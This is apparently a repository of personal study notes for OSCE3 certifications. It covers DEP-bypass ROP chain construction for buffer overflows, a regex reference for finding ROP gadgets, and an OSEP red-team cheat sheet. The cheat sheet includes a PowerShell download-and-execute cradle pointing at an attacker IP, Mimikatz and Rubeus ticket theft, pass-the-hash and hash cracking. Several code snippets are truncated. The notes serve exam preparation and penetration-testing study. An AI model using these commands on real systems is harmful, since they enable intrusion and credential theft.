├── OSWE.md ├── README.md ├── OSED_DEP_Bypass_VA.md ├── OSED_DEP_Bypass_WPM.md ├── OSED_Gadget_Regex.md └── OSEP.md /OSWE.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OSCE3-Notes 2 | Personal learning notes for OSCE3: OSEP, OSWE, and OSED 3 | 4 | Completed **OSEP** and **OSWE** 5 | 6 | ## OSEP 7 | Please check **OSEP.md**. 8 | 9 | Compared to learning notes, it is more like a checklist or cheat sheet. It cannot replace PDF. 10 | 11 | Could contain some dated tips and tricks. 12 | 13 | Not a comprehensive pentesting or red teaming checklist, it is only for OSEP exam preparation. 14 | 15 | ## OSWE 16 | Currently working on this. 17 | 18 | 19 | ## OSED 20 | For DEP bypass portion, please check **OSED_DEP_Bypass_WPM.md**, **OSED_DEP_Bypass_VA.md**, and **OSED_Gadget_Regex.md**. 21 | -------------------------------------------------------------------------------- /OSED_DEP_Bypass_VA.md: -------------------------------------------------------------------------------- 1 | # Stack Layout When Crashing 2 | ``` 3 | _____________________________ 4 | | A * (offset-len(va)) | Lower Address 5 | |_____________________________| ↑ 6 | | VirtualAllocStub Address | ↑ 7 | |_____________________________| ↑ 8 | | Return Address | ↑ 9 | |_____________________________| ↑ 10 | | lpBuffer argument | ↑ 11 | |_____________________________| ↑ 12 | | dwSize argument | ↑ 13 | |_____________________________| ↑ 14 | | flAllocationType argument | ↑ 15 | |_____________________________| ↑ 16 | | flProtect argument | ↑ 17 | |_____________________________| ↓ 18 | | Written EIP | ↓ 19 | | Gadget saves initial ESP | ↓ 20 | |_____________________________| ↓ 21 | | B * gap (gap can be 0) | ↓ 22 | |_____________________________| ↓ 23 | | Start of ROP Chain | ↓ 24 | | Initial ESP | ↓ 25 | |_____________________________| ↓ 26 | | ROP Chain ... | ↓ 27 | |_____________________________| ↓ 28 | | Start of shellcode | ↓ 29 | |_____________________________| Higher Address 30 | 31 | ``` 32 | 33 | # Steps 34 | ## Crash the application 35 | Find the length of payload that is sufficient to crash the application 36 | 37 | ## Find the offset to overwrite EIP 38 | Find the offset that can overwrite EIP 39 | ```bash 40 | //Bash 41 | msf-pattern_create -l 42 | msf-pattern_offset -l -q 43 | ``` 44 | 45 | ## Find the offset from return address to ESP 46 | When the application crashes, find the distance between the return address and ESP. Sometimes it is 0, sometimes it is not. 47 | ```windbg 48 | //WinDBG 49 | dd esp + 50 | ``` 51 | 52 | ```bash 53 | //Bash 54 | msf-pattern_offset -l -q 55 | ``` 56 | Pad the gap, and align valid payload with ESP. 57 | 58 | ## Find bad characters 59 | Replace the actual payload with characters from 0x01 to 0xff. Find all the bad characters. 60 | 61 | ```python 62 | # Python 63 | badchars = ( 64 | b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" 65 | b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 66 | b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 67 | b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 68 | b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 69 | b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 70 | b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 71 | b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 72 | b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 73 | b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 74 | b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 75 | b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 76 | b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 77 | b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 78 | b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 79 | b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 80 | ``` 81 | 82 | The payload is ```A * length + B * gap + \x01\x02\x03\...\xff``` 83 | 84 | ## Select a gadget that saves the initial ESP when crashing 85 | Note the base address of an unprotected module 86 | ```windbg 87 | //WinDBG 88 | .load narly 89 | !nmod 90 | lm m 91 | ``` 92 | 93 | 94 | Eliminate all bad characters, and run rp.exe or the script to collect gadgets. 95 | 96 | Firstly, select a gadget that saves the initial ESP when crashing. 97 | 98 | Some typical forms: 99 | 100 | - push ESP, pop ANY 101 | - push ESP, other instructions, pop ANY 102 | - mov ANY, esp 103 | - lea ANY, esp/[esp] 104 | - lea ANY, [esp+offset] 105 | - (When register1 meets specific requirements) add/sub/mul/or/xor ANY, esp 106 | 107 | ## Overwrite EIP with the gadget that saves the initial ESP 108 | Overwrite EIP with the gadget that saves the initial ESP, the initial ESP points to the start of ROP chain. 109 | 110 | ```python 111 | # python 112 | eip = pack(" 114 | ``` 115 | 116 | ## Construct placeholder arguments required for calling VA 117 | 118 | ```python 119 | va = pack(" 145 | x kernel32!VirtualAllocStub 146 | ?

147 | ``` 148 | 149 | ## Patch VA address argument 150 | The initial ESP points to the start of the ROP chain, it is 0x1c+gap bytes away from VA address argument on the stack 151 | 152 | ## Patch return address 153 | Inc by 4 times, or increase the address by 4 to reach return address argument. Since we have not finished the ROP chain, so reserve a sufficient length for it. For instance, 0x210 bytes. 154 | 155 | So, the shellcode is 0x210 bytes away from the return address argument. 156 | ## Patch lpBuffer argument 157 | The process is very similiar to patching return address, but the offset is 4 bytes less. 158 | 159 | ## Patch dwSize 160 | Increase the address by 4 bytes, fetch and neg the value of dwSize argument. 161 | 162 | ## Patch flAllocationType 163 | Increase the address by 4 bytes, fetch, neg, and inc the value of flAllocationType argument. 164 | 165 | ## Patch flProtect 166 | Increase the address by 4 bytes, fetch and neg the value of flProtect argument. 167 | 168 | ## Align ESP with VA address 169 | Now we are at flProtect argument, sub 0x18 (0x14+4) bytes to reach VA address argument 170 | 171 | ## Calculate the offset between the placeholder shellcode address and actual shellcode address 172 | ```windbg 173 | \\WinDBG 174 | dd l1 (Before calling VA) 175 | dd + 176 | ``` 177 | -------------------------------------------------------------------------------- /OSED_DEP_Bypass_WPM.md: -------------------------------------------------------------------------------- 1 | # Stack Layout When Crashing 2 | ``` 3 | _____________________________ 4 | | A * (offset-len(wpm)） | Lower Address 5 | |_____________________________| ↑ 6 | | WPM Address | ↑ 7 | |_____________________________| ↑ 8 | | Return Address | ↑ 9 | |_____________________________| ↑ 10 | | hProcess argument | ↑ 11 | |_____________________________| ↑ 12 | | lpBaseAddress argument | ↑ 13 | |_____________________________| ↑ 14 | | lpBuffer argument | ↑ 15 | |_____________________________| ↑ 16 | | nSize argument | ↑ 17 | |_____________________________| ↑ 18 | | lpNumberOfBytesWritten arg | ↑ 19 | |_____________________________| ↑ 20 | | Written EIP | ↑ 21 | | Gadget saves initial ESP | ↑ 22 | |_____________________________| ↑ 23 | | B * gap (gap can be 0) | ↓ 24 | |_____________________________| ↓ 25 | | Start of ROP Chain | ↓ 26 | | Initial ESP | ↓ 27 | |_____________________________| ↓ 28 | | ROP Chain ... | ↓ 29 | |_____________________________| ↓ 30 | | Start of shellcode | ↓ 31 | |_____________________________| ↓ 32 | | The first bad character | ↓ 33 | |_____________________________| ↓ 34 | | ...... | ↓ 35 | |_____________________________| ↓ 36 | | The last bad character | ↓ 37 | |_____________________________| Higher Address 38 | ``` 39 | 40 | 41 | # Steps 42 | ## Crash the application 43 | Find the length of payload that is sufficient to crash the application 44 | 45 | ## Find the offset to overwrite EIP 46 | Find the offset that can overwrite EIP 47 | ```bash 48 | //Bash 49 | msf-pattern_create -l 50 | msf-pattern_offset -l -q 51 | ``` 52 | 53 | ## Find the offset from return address to ESP 54 | When the application crashes, find the distance between the return address and ESP. Sometimes it is 0, sometimes it is not. 55 | ```windbg 56 | //WinDBG 57 | dd esp + 58 | ``` 59 | 60 | ```bash 61 | //Bash 62 | msf-pattern_offset -l -q 63 | ``` 64 | Pad the gap, and align valid payload with ESP. 65 | 66 | ## Find bad characters 67 | Replace the actual payload with characters from 0x01 to 0xff. Find all the bad characters. 68 | 69 | ```python 70 | # Python 71 | badchars = ( 72 | b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" 73 | b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 74 | b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 75 | b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 76 | b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 77 | b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 78 | b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 79 | b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 80 | b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 81 | b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 82 | b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 83 | b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 84 | b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 85 | b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 86 | b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 87 | b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 88 | ``` 89 | 90 | The payload is ```A * length + B * gap + \x01\x02\x03\...\xff``` 91 | 92 | ## Select a gadget that saves the initial ESP when crashing 93 | Note the base address of an unprotected module 94 | ```windbg 95 | //WinDBG 96 | .load narly 97 | !nmod 98 | lm m 99 | ``` 100 | 101 | 102 | Eliminate all bad characters, and run rp.exe or the script to collect gadgets. 103 | 104 | Firstly, select a gadget that saves the initial ESP when crashing. 105 | 106 | Some typical forms: 107 | 108 | - push ESP, pop ANY 109 | - push ESP, other instructions, pop ANY 110 | - mov ANY, esp 111 | - lea ANY, esp/[esp] 112 | - lea ANY, [esp+offset] 113 | - (When register1 meets specific requirements) add/sub/mul/or/xor ANY, esp 114 | 115 | ## Overwrite EIP with the gadget that saves the initial ESP 116 | Overwrite EIP with the gadget that saves the initial ESP, the initial ESP points to the start of ROP chain. 117 | 118 | ```python 119 | # python 120 | eip = pack(" 122 | ``` 123 | 124 | ## Construct placeholder arguments required for calling WPM 125 | 126 | ```python 127 | va = pack(") # Shellcode Return Address 129 | va += pack(") # lpBaseAddress 131 | va += pack(")) # lpNumberOfBytesWritten 134 | ``` 135 | 136 | WPM address can be a dummy address(Depending on usable gadgets), or function IAT entry 137 | 138 | Shellcode return address and lpBaseBuffer store the address in .text section where the following hundreds of bytes are available 139 | 140 | hProcess is set 0xffffffff, no need to patch 141 | 142 | lpBuffer stores store placeholder values 143 | 144 | nSize is set 0xfffffe92. Neg to recover the original value. 145 | 146 | lpNumberOfBytesWritten is an unused dword in .data section, no need to patch. 147 | 148 | ## Locate code cave in .text section 149 | Locate code cave in .text section to hold copied shellcode. It is located in the unused part of the last memory page of .text section. 150 | 151 | ```windbg 152 | \\WinDBG 153 | !dh -s 154 | !address + 155 | ``` 156 | 157 | Select an address higher than ``` + + ```, and make sure the following hundreds of bytes are usable. 158 | 159 | ## Locate a usable DWORD in .data section 160 | Locate .data section, which is ``` + ``` 161 | 162 | A usable dword can be the first dword after the end of actual data in .data section: ``` + + + 4``` 163 | 164 | ## Fetch IAT and address 165 | If WPM is imported into the module, fetch the IAT 166 | 167 | If WPM is not imported, find any function in KERNEL32, and calculate the offset between the 2 functions. 168 | 169 | ```windbg 170 | \\WinDBG 171 | x kernel32! 172 | x kernel32!WriteProcessMemoryStub 173 | ?

l1 (Before calling WPM) 290 | dd + 291 | ``` 292 | -------------------------------------------------------------------------------- /OSED_Gadget_Regex.md: -------------------------------------------------------------------------------- 1 | # Quick Reference 2 | Register placeholder: ```[A-Za-z]+``` 3 | 4 | Pointer Deference [register+offset]: ```dword [[A-Za-z]+([+-]0x[0-9A-Fa-f]+)*\]``` 5 | 6 | 7 | # Category 8 | ## Save Initial ESP 9 | ### push esp; Other instructions; pop REG1; ret; 10 | 11 | Priority: `High` 12 | 13 | RegEx: ```push esp(.*); pop [A-Za-z]+``` 14 | 15 | Description: The initial ESP is saved in register REG1. 16 | 17 | Example: ```push esp; mov eax, ecx; pop esi;``` 18 | 19 | ### push esp; pop REG1; ret; 20 | 21 | Priority: `High` 22 | 23 | RegEx: ```push esp; pop [A-Za-z]+;``` 24 | 25 | Description: The initial ESP is saved in register REG1. 26 | 27 | ### lea REG1, esp; ret; 28 | 29 | Priority: `High` 30 | 31 | RegEx: ```lea [A-Za-z]+, esp;``` 32 | 33 | Description: The initial ESP is saved om register REG1. 34 | 35 | ### lea REG1, [esp]; ret; 36 | 37 | Priority: `High` 38 | 39 | RegEx: ```lea [A-Za-z]+, \[esp\];``` 40 | 41 | Description: The initial ESP is saved om register REG1. 42 | 43 | ### lea REG1, [esp+offset]; ret; 44 | 45 | Priority: `High` 46 | 47 | RegEx: ```lea [A-Za-z]+, \[esp``` 48 | 49 | Description: The initial ESP with an offset is saved in register REG1. 50 | 51 | Example: ```lea esi, [esp+4];```, register ESI stores the address `ESP+4`. After the gadget, we need to subtract 4 byte to get the initial ESP. 52 | 53 | ### mov REG1, esp; ret; 54 | 55 | Priority: `High` 56 | 57 | RegEx: ```mov [A-Za-z]+, esp;``` 58 | 59 | Description: Register REG1 saves the initial ESP. 60 | 61 | ### or REG1, esp; 62 | 63 | Priority: `High` 64 | 65 | RegEx: ```or [A-Za-z]+, esp;``` 66 | 67 | Description: Assume REG1 is zero already, then register REG1 saves the initial ESP. 68 | 69 | Example: If a gadget like ```xor eax, eax; ret``` is used, then ```or eax, esp; ret;``` can be used to save initial ESP. 70 | 71 | ### xor REG1, esp; 72 | 73 | Priority: `High` 74 | 75 | RegEx: ```xor [A-Za-z]+, esp;``` 76 | 77 | Description: Assume REG1 is zero already, then register REG1 saves the initial ESP. 78 | 79 | Example: If a gadget like ```xor eax, eax; ret``` is used, then ```xor eax, esp; ret;``` can be used to save initial ESP. 80 | 81 | ### add REG1, esp; 82 | 83 | Priority: `High` 84 | 85 | RegEx: ```add [A-Za-z]+, esp;``` 86 | 87 | Description: Assume REG1 is zero already, then register REG1 saves the initial ESP. 88 | 89 | Example: If a gadget like ```xor eax, eax; ret``` is used, then ```add eax, esp; ret;``` can be used to save initial ESP. 90 | 91 | 92 | ### sub REG1, esp; 93 | 94 | Priority: `High` 95 | 96 | RegEx: ```sub [A-Za-z]+, esp;``` 97 | 98 | Description: Assume REG1 is zero already, then register REG1 saves the initial ESP. 99 | 100 | Example: If a gadget like ```xor eax, eax; ret``` is used, then ```sub eax, esp; ret;``` and ```neg eax;``` can be used to save initial ESP. 101 | 102 | 103 | ## Pointer Dereference 104 | ### mov REG1, [REG+offset]; ret; 105 | 106 | Priority: `High` 107 | 108 | RegEx: ```mov [A-Za-z]+, dword [[A-Za-z]+([+-]0x[0-9A-Fa-f]+)*\]``` 109 | 110 | Description: Can be used to fetch an argument value. 111 | 112 | Example: Assume ESI points to the `2rd` argument of function `VirtualAlloc`, ```mov eax, [esi+0x4];```, register EAX saves the value of `3rd` argument. 113 | 114 | ## Write What Where 115 | ### mov [REG+offset], REG1; ret; 116 | 117 | Priority: `High` 118 | 119 | RegEx: ```mov dword [[A-Za-z]+([+-]0x[0-9A-Fa-f]+)*\], [A-Za-z]+``` 120 | 121 | Description: Can be used to patch an argument. 122 | 123 | Example: Assume EAX points to the `2nd` argument of function VirtualAlloc, ```mov [eax+0x4], ecx;```, the 3rd argument is patched with the value stored in ECX. 124 | 125 | 126 | 127 | 128 | 129 | 130 | ## Swap Register 131 | ### mov REG1, REG2; ret; 132 | 133 | Priority: `High` 134 | 135 | RegEx: ```mov [A-Za-z]+, [A-Za-z]+;``` 136 | 137 | Description: Assign a value for a register. 138 | 139 | Example: Register EAX saves the initial ESP, ```mov esi, eax;```, now register ESI backups the initial ESP, in case EAX will be overwritten in the following instructions. 140 | 141 | ### xchg REG1, REG2; ret; 142 | 143 | Priority: `High` 144 | 145 | RegEx: ```xchg [A-Za-z]+, [A-Za-z]+;``` 146 | 147 | Description: Exchange values stored in the 2 registers. 148 | 149 | ### push REG1; pop REG2; ret; 150 | 151 | Priority: `High` 152 | 153 | RegEx: ```push [A-Za-z]+; pop [A-Za-z]+;``` 154 | 155 | Description: Assign a value for a register. Similar to ```mov REG1, REG2;```. 156 | 157 | ### push REG1; other instructions; pop REG2; ret; 158 | 159 | Priority: `High` 160 | 161 | RegEx: ```push [A-Za-z]+(.*); pop [A-Za-z]+ ``` 162 | 163 | Description: The value stored in register REG1 is assigned to register REG2. 164 | 165 | 166 | 167 | 168 | 169 | ## +1 170 | ### inc REG1; ret; 171 | 172 | Priority: `High` 173 | 174 | RegEx: ```inc [A-Za-z]+;``` 175 | 176 | Description: Can be used to move to the next argument. 177 | 178 | Example: Register EAX points to the 2nd argument of function VirtualAlloc, use the gadget ```inc eax; ret;``` 4 times to move to the 3rd argument. 179 | 180 | ### inc [REG1+offset]; ret; 181 | 182 | Priority: `Medium` 183 | 184 | RegEx: ```inc dword [[A-Za-z]+([+-]0x[0-9A-Fa-f]+)*\]``` 185 | 186 | Description: Can be used to change the value of an argument slightly. 187 | 188 | Example: Assume EAX points to the 2nd argument, due to bad characters, the value of the 3rd argument is 0x0 on the stack now, use gadget ```inc [eax+0x4]; ret;``` to patch the value to `1`. 189 | 190 | 191 | 192 | 193 | 194 | ## -1 195 | ### dec REG1; ret; 196 | 197 | Priority: `Medium` 198 | 199 | RegEx: ```dec [A-Za-z]+;``` 200 | 201 | Description: Can be used to move to the previous argument. 202 | 203 | ### dec [REG1+offset]; ret; 204 | 205 | Priority: `Medium` 206 | 207 | RegEx: ```dec dword [[A-Za-z]+([+-]0x[0-9A-Fa-f]+)*\]``` 208 | 209 | Description: Can be used to change the value of an argument slightly. 210 | 211 | 212 | 213 | 214 | 215 | ## Add Register 216 | ### add REG1, REG2; ret; 217 | 218 | Priority: `High` 219 | 220 | RegEx: ```add [A-Za-z]+, [A-Za-z]+;``` 221 | 222 | Description: Can be used to jump with an offset 223 | 224 | Example: Assume EAX points to the 2nd argument of function VirtualAlloc, ECX saves the offset to reach the start of the shellcode. Use gadget ```add eax, ecx; ret;``` to jump to the shellcode area. 225 | 226 | ### add [REG1+offset], REG2; ret; 227 | 228 | Priority: `High` 229 | 230 | RegEx: ```add dword [[A-Za-z]+([+-]0x[0-9A-Fa-f]+)*\], [A-Za-z]+``` 231 | 232 | Description: Can be used to change the value of an argument. 233 | 234 | Example: Assume EAX points to the 2nd argument of function VirtualAlloc, the 3rd argument is initialized with a placeholder value due to bad characters. RCX stores a value, use gadget ```add [eax+0x4], ecx; ret;``` to patch the 3rd argument. 235 | 236 | 237 | 238 | 239 | 240 | ## Sub Register 241 | ### sub REG1, REG2; ret; 242 | 243 | Priority: `High` 244 | 245 | RegEx: ```sub [A-Za-z]+, [A-Za-z]+;``` 246 | 247 | Description: Can be used to jump with an offset 248 | 249 | ### sub [REG1+offset], REG2; ret; 250 | 251 | Priority: `High` 252 | 253 | RegEx: ```sub dword [[A-Za-z]+([+-]0x[0-9A-Fa-f]+)*\], [A-Za-z]+;``` 254 | 255 | Description: Can be used to change the value of an argument. 256 | 257 | 258 | 259 | 260 | 261 | ## Negate Register 262 | ### neg REG1; ret; 263 | 264 | Priority: `High` 265 | 266 | RegEx: ```neg [A-Za-z]+;``` 267 | 268 | Description: Can be used to negate a fetched argument value. 269 | 270 | Example: Assume ECX stores the value of an argument, to eliminate Null byte, the placeholder value is negated. Use gadget ```neg ecx; ret;``` to set the proper argument value. 271 | 272 | ### neg [REG1+offset]; ret; 273 | 274 | Priority: `High` 275 | 276 | RegEx: ```neg dword [[A-Za-z]+([+-]0x[0-9A-Fa-f]+)*\];``` 277 | 278 | Description: Can be used to directly negate the value of an argument. 279 | 280 | Example: Assume EAX points to the 2nd argument of function VirtualAlloc, the value of the 3rd argument is negated. Use gadget ```neg [eax+0x4]; ret;``` to negate the value. 281 | 282 | 283 | 284 | 285 | 286 | ## Set Register 0 287 | ### xor REG1, REG1; ret; 288 | 289 | Priority: `High` 290 | 291 | RegEx: ```xor [A-Za-z]+, [A-Za-z]+;``` 292 | 293 | Description: If the value of an argument is 0x0, prepare the value before patching the argument. 294 | 295 | Example: Assume the value of an argument should be 0x0, use gadget ```xor ecx, ecx; ret;``` to set ECX to 0x0 before patching the argument. 296 | 297 | ### SUB REG1, REG1; ret; 298 | 299 | Priority: `Medium` 300 | 301 | RegEx: ```sub [A-Za-z]+, [A-Za-z]+;``` 302 | 303 | Description: If the value of an argument is 0x0, prepare the value before patching the argument. 304 | 305 | ### lea [REG1], 0; ret; 306 | 307 | Priority: `Medium` 308 | 309 | RegEx: ```lea \[[A-Za-z]+\], (0)*(x)*(0)+;``` 310 | 311 | Description: If the value of an argument is 0x0, prepare the value before patching the argument. 312 | 313 | ### mov REG1, 0; ret; 314 | 315 | Priority: `Medium` 316 | 317 | RegEx: ```mov [A-Za-z]+, (0)*(x)*(0)+;``` 318 | 319 | Description: If the value of an argument is 0x0, prepare the value before patching the argument. 320 | 321 | ### and REG1, 0; ret; 322 | 323 | Priority: `Medium` 324 | 325 | RegEx: ```and [A-Za-z]+, (0)*(x)*(0)+;``` 326 | 327 | Description: If the value of an argument is 0x0, prepare the value before patching the argument. 328 | 329 | ### push 0; pop REG1; ret; 330 | 331 | Priority: `Medium` 332 | 333 | RegEx: ```push (0)*(x)*(0)+; pop [A-Za-z]+;``` 334 | 335 | Description: If the value of an argument is 0x0, prepare the value before patching the argument. 336 | 337 | 338 | 339 | 340 | 341 | ## pop 342 | ### pop REG1; ret; 343 | 344 | Priority: `High` 345 | 346 | RegEx: ```pop [A-Za-z]+;``` 347 | 348 | Description: Can be used to save a value prepared for an argument in a register, 349 | 350 | Example: Before patching the value of an argument, use gadget ```pop ecx; ret;``` to set a value for ECX. 351 | 352 | 353 | 354 | 355 | 356 | ## Decode byte 357 | ### add [REG1+offset]; l-Reg2/h-Reg2; ret; 358 | 359 | Priority: `High` 360 | 361 | RegEx: ```add byte \[[A-Za-z]+([+-]0x[0-9A-Fa-f]+)*\]+, [A-Za-z]+``` 362 | 363 | Description: Decode a byte by adding a small value 364 | 365 | Example: Use gadget ```add byte [eax], cl/ch; ret;```` to add cl/ch to the byte in [eax] 366 | 367 | ### sub [REG1+offset]; l-Reg2/h-Reg2; ret; 368 | 369 | Priority: `High` 370 | 371 | RegEx: ```sub byte \[[A-Za-z]+([+-]0x[0-9A-Fa-f]+)*\]+, [A-Za-z]+``` 372 | 373 | Description: Decode a byte by subbing a small value 374 | 375 | Example: Use gadget ```sub byte [eax], cl/ch; ret;```` to sub cl/ch to the byte in [eax] 376 | 377 | 378 | 379 | 380 | ## Align EBP 381 | ### push REG1; pop ebp; ret; 382 | 383 | Priority: `High` 384 | 385 | RegEx: ```push [A-Za-z]+; pop ebp;``` 386 | 387 | Description: Can be used to align EBP with the function address. 388 | 389 | Example: Assume register EAX points to the function address, use gadget ```push eax, ebp; ret``` to align EBP with the function address on the stack. 390 | 391 | ### xchg REG1, ebp; ret; 392 | 393 | Priority: `High` 394 | 395 | RegEx: ```xchg [A-Za-z]+, ebp;``` 396 | 397 | Description: Can be used to align EBP with the function address. 398 | 399 | ### xchg ebp, REG1; ret; 400 | 401 | Priority: `High` 402 | 403 | RegEx: ```xchg ebp, [A-Za-z]+;``` 404 | 405 | Description: Can be used to align EBP with the function address. 406 | 407 | ### push ebp; push REG1; pop REG2; pop REG3; ret; 408 | 409 | Priority: `High` 410 | 411 | RegEx: ```push ebp; push [A-Za-z]+; pop [A-Za-z]+; pop [A-Za-z]+;``` 412 | 413 | Description: Can be used to align EBP with the function address. 414 | 415 | 416 | 417 | 418 | 419 | ## EIP to ESP 420 | ### mov esp, ebp; pop ebp; ret; 421 | 422 | Priority: `High` 423 | 424 | RegEx: ```mov esp, ebp; pop ebp; ret;``` 425 | 426 | Description: Transfer the execution to ESP. 427 | 428 | ### leave; ret; 429 | 430 | Priority: `High` 431 | 432 | RegEx: ```leave;``` 433 | 434 | Description: It is equal to gadget ```mov esp, esp; pop ebp; ret```. 435 | 436 | ### mov esp, REG1; ret; 437 | 438 | Priority: `High` 439 | 440 | RegEx: ```mov esp, [A-Za-z]+;``` 441 | 442 | Description: Align ESP with the function address on the stack. 443 | 444 | Example: Assume register EAX points to the function address on the stack, use gadget ```mov esp, eax; ret;``` to make ESP align with the function address as well. 445 | 446 | ### xchg REG1, esp; ret; 447 | 448 | Priority: `High` 449 | 450 | RegEx: ```xchg [A-Za-z]+, esp;``` 451 | 452 | Description: Align ESP with the function address on the stack. 453 | 454 | ### xchg esp; REG1; ret; 455 | 456 | Priority: `High` 457 | 458 | RegEx: ```xchg esp, [A-Za-z]+;``` 459 | 460 | Description: Align ESP with the function address on the stack. 461 | 462 | -------------------------------------------------------------------------------- /OSEP.md: -------------------------------------------------------------------------------- 1 | # OSEP Exploitation Flow 2 | ## Common Commands 3 | ### Encode PowerShell payload 4 | 5 | - On Windows: 6 | ```powershell 7 | [system.convert]::tobase64string([system.text.encoding]::unicode.getbytes('IEX ((new-object net.webclient).downloadstring("http://192.168.x.y/runner.txt"))')) 8 | ``` 9 | - On Linux: 10 | ```bash 11 | echo -en 'IEX ((new-object net.webclient).downloadstring("http://192.168.x.y/runner.txt"))' | iconv -t UTF-16LE | base64 -w 0 12 | ``` 13 | ### Save a ticket to file 14 | 15 | - On Windows 16 | ```powershell 17 | [System.IO.File]::WriteAllBytes("C:\windows\temp\bob.kirbi", [System.Convert]::FromBase64String("xxxxxx=")) 18 | ``` 19 | - On linux 20 | ```bash 21 | echo '…' | base64 -d > bob.kirbi 22 | ``` 23 | ### List tickets 24 | 25 | - Mimikatz 26 | ```powershell 27 | sekurlsa::tickets 28 | ``` 29 | - Rubeus 30 | ```powershell 31 | rubeus.exe triage 32 | ``` 33 | - Operating System 34 | ```powershell 35 | klist 36 | ``` 37 | 38 | ### Export a ticket 39 | 40 | - Mimikatz 41 | ```powershell 42 | sekurlsa::tickets /export 43 | ``` 44 | - Rubeus 45 | ```powershell 46 | rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap 47 | ``` 48 | 49 | ### Import a ticket 50 | 51 | - Mimikatz 52 | ```powershell 53 | kerberos::ptt ticket.kirbi 54 | ``` 55 | - Rubeus 56 | ```powershell 57 | rubeus.exe /ptt /ticket: [doIF…] 58 | ``` 59 | 60 | ### Hash to Password 61 | 62 | - NTLM 63 | ```bash 64 | hashcat -a 0 -m 1000 hash.txt dict/rockyou.txt 65 | ``` 66 | - Net-NTLMv2 67 | ```bash 68 | john --wordlist=dict/rockyou.txt hash.txt 69 | 70 | hashcat -m 5600 hash.txt dict/rockyou.txt --force 71 | ``` 72 | - Kerberoasting 73 | ```bash 74 | john --format=krb5tgs --wordlist=dict/rockyou.txt hash.txt 75 | ``` 76 | - ASREPRoasting 77 | ```bash 78 | hashcat -a 0 -m 18200 hash.txt dict/rockyou.txt 79 | 80 | john --format=krb5asrep --wordlist=dict/rockyou.txt hash.txt 81 | ``` 82 | 83 | ### Password to Hash 84 | ```powershell 85 | rubeus.exe hash /domain:red.com /user:rbcd$ /password:123 86 | ``` 87 | 88 | ### Use of ticket 89 | 90 | - Mimikatz 91 | ```powershell 92 | kerberos::ptt ticket.kirbi 93 | ``` 94 | - Rubeus: 95 | ```powershell 96 | rubeus.exe /ptt /ticket: [doIF…] 97 | ``` 98 | 99 | ### Use of hash 100 | 101 | - Mimikatz 102 | ```powershell 103 | sekurlsa::pth /user:admin /domain:blue /ntlm:2892D26CDF84D7A70E2EB3B9F05C425E /run:"mstsc.exe /restrictedadmin" 104 | ``` 105 | - Evil-WinRM 106 | ```bash 107 | evil-winrm -i 192.168.10.10 -u alice -H [hash] 108 | ``` 109 | - Xfreerdp 110 | ```bash 111 | xfreerdp /v:192.168.10.10 /u:alice /pth:[hash] /d:red.com /dynamic-resolution 112 | ``` 113 | 114 | ### SID and Name 115 | 116 | - SID to 